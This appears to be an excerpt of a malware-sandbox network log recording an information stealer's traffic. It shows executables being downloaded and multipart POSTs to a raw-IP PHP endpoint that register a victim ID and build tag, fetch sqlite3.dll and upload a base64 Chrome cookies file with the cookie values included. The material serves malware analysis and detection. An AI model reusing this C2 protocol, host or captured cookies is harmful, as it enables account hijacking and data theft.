72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 
65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 02 Jul 2024 02:12:09 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 
00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 02:12:13 GMTContent-Type: application/octet-streamContent-Length: 1907200Last-Modified: Tue, 02 Jul 2024 01:58:58 GMTConnection: keep-aliveETag: "66835ee2-1d1a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 f0 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 4c 00 00 04 00 00 1a 91 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 58 a0 06 00 6c 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 de 4b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 dd 4b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 
ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 30 2b 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 77 74 68 63 75 75 78 00 00 1a 00 00 e0 31 00 00 00 1a 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 72 67 65 6a 70 76 67 75 00 10 00 00 00 e0 4b 00 00 06 00 00 00 f2 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 f0 4b 00 00 22 00 00 00 f8 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 02 Jul 2024 02:13:04 GMTContent-Type: application/octet-streamContent-Length: 2514944Last-Modified: Tue, 02 Jul 2024 00:00:51 GMTConnection: keep-aliveETag: "66834333-266000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4a 8c 64 5a 0e ed 0a 09 0e ed 0a 09 0e ed 0a 09 61 9b a1 09 16 ed 0a 09 61 9b 94 09 03 ed 0a 09 61 9b a0 09 35 ed 0a 09 07 95 89 09 0d ed 0a 09 07 95 99 09 0c ed 0a 09 8e 94 0b 08 0d ed 0a 09 0e ed 0b 09 5a ed 0a 09 61 9b a5 09 01 ed 0a 09 61 9b 97 09 0f ed 0a 09 52 69 63 68 0e ed 0a 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 f6 41 83 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ac 01 00 00 e8 21 00 00 00 00 00 40 66 bf 00 00 10 00 00 00 c0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 80 bf 00 00 04 00 00 00 00 00 00 02 00 40 80 00 00 20 00 00 20 00 00 00 00 20 00 00 20 00 00 00 00 00 00 10 00 00 00 20 80 9d 00 9b 0c 00 00 bc 8c 9d 00 0c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 01 00 00 10 00 00 00 a4 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 01 00 00 40 00 00 00 a8 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 30 21 00 00 40 02 00 00 04 00 00 00 e8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 50 00 00 00 70 23 00 00 20 00 00 00 ec 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 90 79 00 00 c0 23 00 00 28 03 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 30 22 00 00 50 9d 00 00 2c 22 00 00 34 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AKJDGIEHCAEHIEBFBKKKHost: 85.28.47.4Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 35 30 36 38 32 30 43 43 35 33 33 32 36 33 32 34 32 37 36 35 39 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6a 6f 6e 79 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4a 44 47 49 45 48 43 41 45 48 49 45 42 46 42 4b 4b 4b 2d 2d 0d 0a Data Ascii: ------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="hwid"8506820CC5332632427659------AKJDGIEHCAEHIEBFBKKKContent-Disposition: form-data; name="build"jony------AKJDGIEHCAEHIEBFBKKK--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJEHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="message"browsers------JJDGCGHCGHCBFHJJKKJE--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGCHost: 85.28.47.4Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 2d 2d 0d 0a Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="message"plugins------DBFCBGCGIJKJKECAKEGC--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FBFHJJJDAFBKEBGDGHCGHost: 85.28.47.4Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 46 42 46 48 4a 4a 4a 44 41 46 42 4b 45 42 47 44 47 48 43 47 2d 2d 0d 0a Data Ascii: ------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------FBFHJJJDAFBKEBGDGHCGContent-Disposition: form-data; name="message"fplugins------FBFHJJJDAFBKEBGDGHCG--
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KJDGIJECFIEBFIDHCGHD Host: 85.28.47.4 Content-Length: 5683 Connection: Keep-Alive Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1 Host: 85.28.47.4 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIDGCFBFBFBKEBGCAFCGHost: 85.28.47.4Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 63 33 64 33 65 39 35 33 33 35 39 35 37 32 31 35 64 66 33 62 36 39 38 38 32 37 34 65 32 61 35 66 30 39 64 32 35 36 61 66 63 33 31 37 65 39 65 62 32 32 39 61 30 34 37 33 66 37 65 36 36 38 30 37 30 36 65 32 64 31 31 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 
54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 47 43 46 42 46 42 46 42 4b 45 42 47 43 41 46 43 47 2d 2d 0d 0a Data Ascii: ------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="token"0c3d3e95335957215df3b6988274e2a5f09d256afc317e9eb229a0473f7e6680706e2d11------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIDGCFBFBFBKEBGCAFCGContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12Z
